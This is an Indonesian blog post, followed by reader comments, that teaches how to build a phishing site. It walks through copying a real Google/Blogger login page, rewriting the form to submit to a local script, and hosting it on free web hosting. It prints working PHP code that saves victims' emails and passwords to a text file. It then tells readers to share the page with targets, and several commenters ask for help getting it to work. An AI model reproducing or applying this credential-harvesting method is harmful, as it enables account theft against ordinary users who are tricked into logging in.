Cara Membuat Web Pishing

Labels:

Web Pishing...???
Siapa sih yang gak kenal dengan namanya Web Phising,Web Phising adalah situs atau sebuah web yang isinya untuk memancing seseorang login di situs itu dan anda akan mendapatkan email dan passwordnya.
Web Phising mirip seperti Keylogger,tetapi Web Phising dengan situs web sedangkan keylogger dengan software.
Kalau mau lebih jelas silahkan searching di mbah google :D
Oke,kali ini saya akan share cara membuat web phising,saya harap anda menggunakannya dengan bijak !
1.Cari situs yang ingin anda phising misalnya blogger,lalu tekan CTRL+U
2.Copy semua kode yang ada disitu dan pastekan di notepad anda!
3.Lalu anda cari kode ini !

<form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth"method="post">
4.Ganti kode yang berwarna merah di atas dengan login .php dan ganti juga kode yang berwarna hijau di atas dengan get,contohnya seperti ini
<form id="gaia_loginform" action="login.php"method="get">
5.Lalu simpan notepad dan beri nama index.html
6.Buka notepad lagi,lalu copy dan pastekan kode di bawah ini di notepad anda dan simpan lalu beri nama login.php
<?php
header("Location: http://www.blogger.com/");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
7.Langkah selanjutnya anda login ke hostingan anda tapi kali ini saya menggunakan 000webhost
8.Jika sudah login,klik Go To CPanel
 
dan klik juga Another File Manager 
9.Nanti anda akan masuk ke File Manager,jika sudah masuk ke menu File Manager,klik public_html


lalu upload file yang index.html dan login.php yang tadi !
udah ke upload semuanya kan ?
oke,kalau udah ke upload hapus file default.php yang ada di public_html.
Nah...jadi deh web phising buatan anda,untuk melihat password korban caranya:
Coba anda login dulu ke web phising buatan anda tadi,anda isi email dengan "test" tanpa tanda petik
dan password terserah anda.Oke lalu reload menu public_html,jika sudah di reload akan muncul file otomatis yaitu password.php lalu download deh dengan cara klik 2 kali password.php itu,nah disitu deh ke simpan semua password korban.
10.Tinggal di share aja tuh web phising buatan anda.
Oke sekian postingan saya kali ini,semoga bermanfaat dan jangan lupa follow blog ini ya sobat.
Kalau anda masih belum mengerti jangan malu untuk bertanya !

 Warning...!!!
Semua gambar di atas asli dari webhostingan saya tanpa sedikit pun dapat dari google.
Gunakan trik ini dengan bijak !

9 komentar:

  1. Baru tau ARTINYA Web Pishing -.-
    Tapi keliatannya menarik juga tuh ^^ wkwkwk ..
    Kapan" coba ahh ^^ hehe

    BalasHapus
  2. Postingan tentang cara membuat web pishing... sangat bagus dan menarik untuk dibaca. Saya suka mengunjungi blog ini.

    BalasHapus
  3. Gan mohon bantuannya...
    kenapa kok file password.txt pas dibuka selalu kosong :(
    mohon dibantu

    BalasHapus
    Balasan
    1. Brarti belum ada yang login gan...

      Hapus
    2. udah gan,, saya coba login sendiri
      knp kok masih kosong

      Hapus
  4. saya sudah reload file manager, tpi password.txt tidak keluar pun..

    BalasHapus

Baca dulu sebelum berkomentar !
-Jangan menyertakan LINK/ANCHOR TEXT
-Jangan menggunakan kata-kata kotor
-Jangan promosi blog atau produk yang di jual di blog anda
-Jangan ngajak berantam sesama blogger lain